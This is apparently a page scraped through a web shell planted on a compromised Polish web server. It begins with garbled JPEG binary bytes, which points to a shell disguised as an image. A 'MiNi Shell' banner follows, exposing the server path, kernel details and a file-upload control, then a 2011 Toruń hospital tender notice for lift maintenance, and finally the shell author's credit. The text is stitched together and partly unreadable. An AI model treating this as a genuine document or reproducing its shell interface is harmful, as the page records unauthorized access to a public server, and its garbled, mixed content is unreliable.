JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111128/310355-N-2011.html

<p class="kh_header"><b>Toruń: Świadczenie usług w zakresie konserwacji, napraw oraz sprawowania serwisu całodobowego przez wszystkie dni tygodnia urządzeń dźwigowych dla Wojewódzkiego Szpitala Zespolonego w Toruniu z lokalizacją przy ul. Św. Józefa 53/59 i przy ul. Konstytucji 3 Maja 42.</b><br>
<b>Numer ogłoszenia: 310355 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie konserwacji, napraw oraz sprawowania serwisu całodobowego przez wszystkie dni tygodnia urządzeń dźwigowych dla Wojewódzkiego Szpitala Zespolonego w Toruniu z lokalizacją przy ul. Św. Józefa 53/59 i przy ul. Konstytucji 3 Maja 42..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług w zakresie konserwacji, napraw oraz sprawowania serwisu całodobowego przez wszystkie dni tygodnia urządzeń dźwigowych dla Wojewódzkiego Szpitala Zespolonego w Toruniu z lokalizacją przy ul. Św. Józefa 53/59 i przy ul. Konstytucji 3 Maja 42. <br>
2. Wykonawca zobowiązany będzie do sprawowania całodobowego serwisu przez wszystkie dni tygodnia w tym w niedziele i święta pod ustalonym numerem telefonu. <br>
3. W ramach świadczonych usług Wykonawca zobowiązany będzie do:
a) konserwowania dźwigów w zakresie i w sposób ustalony z:<br>
 - dokumentacją techniczno-ruchową, <br>
 - instrukcją obsługi i konserwacji dźwigów elektrycznych,<br>
 - przepisami UDT oraz innymi obowiązującymi w tym zakresie,<br>
b) współpracy z Urzędem Dozoru Technicznego,<br>
c) przygotowania dźwigów do odbioru przez UDT,<br>
d) utrzymania zleconych do konserwacji dźwigów w ruchu, z wyjątkiem przerw na prowadzenie niezbędnych napraw i remontów,<br>
e) utrzymania zleconych do konserwacji dźwigów w stanie technicznym zapewniającym ich bezpieczną eksploatację, <br>
f) prowadzenia rejestrów prac konserwacyjnych urządzeń dźwigowych,<br>
g) wykonywania napraw dźwigowych wychodzących poza zakres konserwacji za uprzednim uzgodnieniem zakresu napraw z upoważnionym przedstawicielem Zamawiającego,<br>
h) wykonywania nieodpłatnie pomiarów ochronnych  na każdym dźwigu jeden raz w roku.<br>

4. Podczas przeprowadzania czynności przez Urząd Dozoru Technicznego Wykonawca musi zapewnić obecność konserwatora.<br>

5. Na zakup części niezbędnych do wykonania naprawy dźwigu Wykonawca musi uzyskać zgodę  
    Zamawiającego po przedstawieniu kalkulacji kosztów naprawy.<br>

6. Czas reakcji serwisu na podjęcie czynności w przypadku zaistnienia awarii dźwigu - do 10 minut od chwili przyjęcia zgłoszenia przez Wykonawcę.<br>

7. Zamawiający dopuszcza możliwość wydzierżawienia przez Wykonawcę pomieszczenia o powierzchni 14,17 m2 na terenie Wojewódzkiego Szpitala Zespolonego w Toruniu z lokalizacją przy ul. Św. Józefa 53/59. Koszt dzierżawy pomieszczenia w skali 1 miesiąca wynosi 609,31 zł netto + opłaty za media, do których zalicza się: energie elektryczną, zimną wodę, ścieki, energię cieplną oraz gaz ziemny. <br>
7.1.Opłaty za energie elektryczną, zimną wodę, ścieki, energię cieplną oraz gaz ziemny będą naliczane 	 zgodnie z kosztami Zamawiającego przypadającymi na 1 m2 powierzchni pomieszczenia.<br>
7.2. Na dzierżawę pomieszczenia zostanie zawarta oddzielna umowa z Wydzierżawiającym.<br><br>
	
Rodzaj i typ urządzeń dźwigowych znajdujących się w obiektach
Zamawiającego<br>

z lokalizacją przy ul. Konstytucji 3 Maja 42<br>

1	Dźwig osobowy <br>
(przy Administracji - Budynek Nr 8)<br>
Nr fabryczny 24/ZUD/06/2006<br>
a) udźwig - 1600 kg<br>
b) ilość przystanków - 3<br>
c) ilość drzwi - 3<br>
2	Dźwig towarowo-osobowy <br>
( przy SOR - Budynek Nr 1)<br>
Nr fabryczny 02/ZUD/03/2003<br>
a) udźwig - 1600 kg<br>
b) ilość przystanków - 3<br>
c) ilość drzwi - 3<br>
3	Dźwig osobowy ( przy szatni - Budynek Nr 2)<br>
Nr fabryczny 38/ZUD/2006<br>
a) udźwig - 630 kg<br>
b) ilość przystanków - 3<br>
c) ilość drzwi - 3<br>
4	Dźwig osobowy ( przy szatni - Budynek Nr 2)<br>
Nr fabryczny 37/ZUD/2006/2007<br>
a) udźwig - 630 kg<br>
b) ilość przystanków - 3<br>
c) ilość drzwi - 3<br>
5	Dźwig towarowo-osobowy <br>
(Blok Operacyjny - Budynek Nr 7)<br>
Nr fabryczny 782/O/98<br>
a) udźwig - 1000 kg<br>
b) ilość przystanków - 3<br>
c) ilość drzwi - 3<br>

6	Dźwig towarowo-osobowy <br>
(Blok Operacyjny - Budynek Nr 7)<br>
Nr fabryczny 781/O/98<br>
a) udźwig - 1000 kg<br>
b) ilość przystanków - 3<br>
c) ilość drzwi - 3<br>
7	Dźwig towarowo-osobowy <br>
(Oddział Otolaryngologii - Budynek Nr 6)<br>
Nr fabryczny 783/O/98<br>
a) udźwig - 1000 kg<br>
b) ilość przystanków - 4<br>
c) ilość drzwi - 4<br>
8	Dźwig towarowo-osobowy <br>
(Oddział Otolaryngologii- Budynek Nr 6)<br>
Nr fabryczny 784/O/98<br>
a) udźwig - 1000 kg<br>
b) ilość przystanków - 4<br>
c) ilość drzwi - 4<br>

9	Dźwig towarowo - osobowy <br>
(Kuchnia - Budynek Nr 9)<br>
Nr fabryczny 779/98<br>
a) udźwig - 1250 kg<br>
b) ilość przystanków - 2<br>
c) ilość drzwi - 2<br>

10	Dźwig towarowo - osobowy<br>
(Kuchnia - Budynek Nr 9 )<br>
Nr fabryczny 777/98<br>
a) udźwig - 1250 kg<br>
b) ilość przystanków - 2<br>
c) ilość drzwi - 2<br>

11	Dźwig towarowo - osobowy<br>
(Kuchnia - Budynek Nr 9 )<br>
Nr fabryczny 776/98<br>
a) udźwig - 1250 kg<br>
b) ilość przystanków - 2<br>
c) ilość drzwi - 2<br>

12	Dźwig towarowo - osobowy<br>
(Kuchnia - Budynek Nr 9 )<br>
Nr fabryczny 778/98<br>
a) udźwig - 1250 kg<br>
b) ilość przystanków - 2<br>
c) ilość drzwi - 2<br>

13	Dźwig towarowo - osobowy<br>
(Blok Operacyjny - Budynek Nr 7)<br>
Nr fabryczny 780/O/98<br>
a) udźwig - 1600 kg<br>
b) ilość przystanków - 3<br>
c) ilość drzwi - 3<br>
14	Dźwig towarowy (Sterylizacja - Budynek Nr 7)<br>
Nr fabryczny BKG 53127<br>
a) udźwig - 100 kg<br>
b) ilość przystanków - 2<br>
c) ilość drzwi - 2<br>
z lokalizacją przy ul. Św. Józefa 53/59<br>

15	Dźwig towarowy (Oddział Wewnętrzny, Kliniczny Oddział Onkologii)<br>
Nr fabryczny 19887<br>
a/ udźwig - 100 kg<br>
b/ ilość przystanków - 3<br>
c/ ilość drzwi - 3<br>
16	Dźwig osobowy (Oddział Nefrologii i Chorób Wewnętrznych)<br>
Nr fabryczny A-22030<br>
a/ udźwig -1000 kg<br>
b/ ilość przystanków -3<br>
c/ ilość drzwi - 3<br>
17	Dźwig towarowo- osobowy kuchenny (przy aptece szpitalnej) <br>
Nr fabryczny 51595<br>
a/ udźwig - 500 kg<br>
b/ ilość przystanków - 7<br>
c/ ilość drzwi - 8<br>
18	Dźwig towarowo- osobowy kuchenny (przy wejściu głównym)<br>
Nr fabryczny 51592<br>
a/ udźwig - 500 kg<br>
b/ ilość przystanków - 8<br>
c/ ilość drzwi - 8<br>
19	Dźwig osobowo - towarowy  (przy IPP)<br>
Klatka schodowa A<br>
Nr fabryczny 1385/o/2009<br>
a/ udźwig - 1600 kg<br>
b/ ilość przystanków - 8<br>
c/ ilość drzwi - 10<br>
20	Dźwig osobowo - towarowy (przy wejściu głównym) klatka schodowa B <br>
Nr fabryczny 1386/0/2009 <br>
a/ udźwig - 1600 kg<br>
b/ ilość przystanków - 8<br>
c/ ilość drzwi - 10<br>
21	Dźwig osobowy (przy aptece szpitalnej) <br>
Klatka schodowa C<br>
Nr fabr.1387/o/2009<br>
a/ udźwig - 630 kg<br>
b/ ilość przystanków - 8<br>
c/ ilość drzwi - 8 <br>
22	Dźwig do przemieszczania osób niepełnosprawnych (przy łączniku między Rezonansem Magnetycznym a Zakładem Diagnostyki Obrazowej)<br>
Nr fabryczny 364<br>
a/ udźwig - 250 kg<br>
b/ ilość przystanków - 2<br>
c/  ilość drzwi - 1<br>
23	Towarowy dźwig platformowy przystosowany do przewozu osób (przy Wojewódzkiej Przychodni Rehabilitacyjnej)<br>
Nr fabryczny H 10405<br>
a/ udźwig - 1000 kg<br>
b/ ilość przystanków - 3<br>
c/ ilość drzwi - 3<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualną decyzję Urzędu Dozoru Technicznego uprawniającą Wykonawcę do konserwacji 
i naprawy dźwigów osobowych i towarowych - zgodnie z ustawą z dnia 21.12.2000r. 
o dozorze technicznym ( Dz. U. z 2011 r. Nr 132, poz. 766).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych lub wykonywanych min. 2 usług, których przedmiotem zamówienia jest realizacja usług w zakresie konserwacji i napraw urządzeń dźwigowych o wartości min. 28.500,00zł brutto w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie;

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ oświadczenie Wykonawcy, że osoby, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia posiadają odpowiednie kwalifikacje zawodowe i aktualne uprawnienia do konserwacji dźwigów wydane przez Urząd Dozoru Technicznego oraz uprawnienia dotyczące eksploatacji urządzeń do 1 kV.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty 23.750,00 zł wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         /Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.
    Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
	Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ oświadczenie o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ,<br>
b/ oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny podane w ofercie będą obowiązywać przez okres trwania umowy a jedynie w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.wszz.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie 
i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com